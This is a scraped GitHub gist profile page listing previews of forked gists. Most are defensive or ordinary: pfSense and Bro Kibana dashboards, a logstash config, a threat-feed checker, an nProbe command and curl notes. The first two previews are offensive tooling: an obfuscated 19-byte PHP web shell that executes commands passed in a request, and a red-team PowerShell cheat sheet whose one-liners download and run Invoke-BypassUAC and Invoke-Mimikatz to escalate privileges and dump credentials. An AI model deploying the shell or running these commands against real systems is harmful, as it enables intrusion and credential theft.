Xpwd andr6

Supreme excellence consists of breaking the enemy's resistance without fighting.

9 followers · 30 following

Planet Earth

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

andr6 / rev_shell.php

Created May 7, 2023 10:34 — forked from 0xSojalSec/rev_shell.php

The shortest non-alphanumeric reverse shell script (19 bytes)

	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:

andr6 / RedTeam_CheatSheet.ps1

Created April 12, 2019 10:37 — forked from jivoi/RedTeam_CheatSheet.ps1

	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands

andr6 / start_nprobe

Created January 18, 2019 14:05 — forked from evoxco/start_nprobe

Nprobe command line with ElasticSearch logging

/usr/local/bin/nprobe -b 0 -i eth1 --json-labels -t 60  --elastic "nProbe;nprobe;http://127.0.0.1:9200/_bulk" -T "%IPV4_SRC_ADDR %L4_SRC_PORT %IPV4_DST_ADDR %L4_DST_PORT %PROTOCOL %IN_BYTES %OUT_BYTES %FIRST_SWITCHED %LAST_SWITCHED %IN_PKTS %OUT_PKTS %IP_PROTOCOL_VERSION %APPLICATION_ID %L7_PROTO_NAME %ICMP_TYPE %SRC_IP_COUNTRY %DST_IP_COUNTRY %APPL_LATENCY_MS %HTTP_URL %HTTP_RET_CODE %HTTP_REFERER %HTTP_UA %HTTP_MIME %HTTP_HOST %HTTP_FBOOK_CHAT %HTTP_SITE %HTTP_METHOD" -G 2>/tmp/log

andr6 / checkthreatfeed.py

Created January 18, 2019 14:04 — forked from evoxco/checkthreatfeed.py

Open source Threat intel check via C1fApp API

	#!/usr/bin/env python
	# -- coding: utf-8 --

	'''
	usage:
	cat something_withIPs \| python checkthreatfeed.py
	www.c1fapp.com
	'''

	import sys

andr6 / pfsense3.json

Created January 18, 2019 14:04 — forked from evoxco/pfsense3.json

PFSense kibana dashboard

	{
	"title": "PFSense Firewall",
	"services": {
	"query": {
	"idQueue": [],
	"list": {
	"0": {
	"query": "tags: \"PFSense\" AND action: \"pass\"",
	"alias": "Passed",
	"color": "#6ED0E0",

andr6 / pfsense-logstash.conf

Created January 18, 2019 14:04 — forked from evoxco/pfsense-logstash.conf

PFSense 2.1 logstash config

	input {
	tcp {
	type => syslog
	port => 514
	}
	udp {
	type => syslog
	port => 514
	}
	}

andr6 / BroIDS-Kibana-Dashboard

Created January 18, 2019 14:03 — forked from evoxco/BroIDS-Kibana-Dashboard

Bro ids Kibana Dashboard [Part 1]

	{
	"title": "Broids",
	"services": {
	"query": {
	"list": {
	"0": {
	"id": 0,
	"color": "#7EB26D",
	"alias": "All Connections",
	"pin": true,

andr6 / c1fappThreatIntell

Created January 18, 2019 14:03 — forked from evoxco/c1fappThreatIntell

C1fApp Threat Intelligence Kibana dashboard

	{
	"title": "C1fApp Threat Intelligence",
	"services": {
	"query": {
	"list": {
	"0": {
	"query": "index: \"cif\"",
	"alias": "Cif Index",
	"color": "#7EB26D",
	"id": 0,

andr6 / curl.md

Created February 19, 2018 09:05 — forked from subfuzion/curl.md

curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.